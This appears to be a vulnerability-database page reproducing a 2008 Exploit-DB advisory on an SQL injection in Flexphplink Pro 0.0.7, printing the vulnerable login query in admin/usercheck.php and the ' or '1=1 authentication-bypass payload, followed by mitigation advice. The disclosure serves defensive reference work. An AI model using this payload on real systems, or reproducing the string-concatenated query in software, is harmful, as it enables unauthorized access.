header-logo
Suggest Exploit
vendor:
Flexphplink Pro
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flexphplink Pro
Affected Version From: 0.0.7
Affected Version To: 0.0.7
Patch Exists: NO
Related CWE:
CPE: a:flexphplink:flexphplink_pro:0.0.7
Metasploit:
Other Scripts:
Platforms Tested:
2008

Flexphplink Pro SQL Injection Vulnerability

The vulnerability exists in the usercheck.php file of the Flexphplink Pro CMS. It allows an attacker to execute arbitrary SQL queries by manipulating the 'username' and 'password' parameters. By providing the SQL code ' or '1=1, an attacker can bypass authentication and gain unauthorized access to the system.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users are advised to restrict access to the affected files or implement input validation and parameterized queries to mitigate the risk.
Source

Exploit-DB raw data:

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphplink Pro
Version: 0.0.7
Download: http://www.china-on-site.com/flexphplink/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Visit My Site Pls :P

# milw0rm.com [2008-12-29]

Navigation

Suggest Exploit

Services By CQR